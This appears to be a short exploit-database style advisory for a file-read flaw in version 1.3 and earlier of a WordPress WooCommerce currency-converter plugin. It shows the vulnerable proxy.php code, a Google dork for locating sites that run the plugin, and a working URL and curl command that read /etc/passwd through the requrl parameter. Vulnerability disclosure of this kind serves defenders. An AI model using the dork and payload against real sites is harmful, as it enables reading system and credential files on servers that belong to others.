# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux

Description:

proxy.php's code:

<?php
// The requrl parameter is passed to file_get_contents() without any validation.
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>

Based on user input, the content of a file is printed out (unfortunately not included), so any HTML file can be loaded, and an attacker may be able to read any local file which is not executed on the server.

Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

POC:
curl --silent --url "http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd"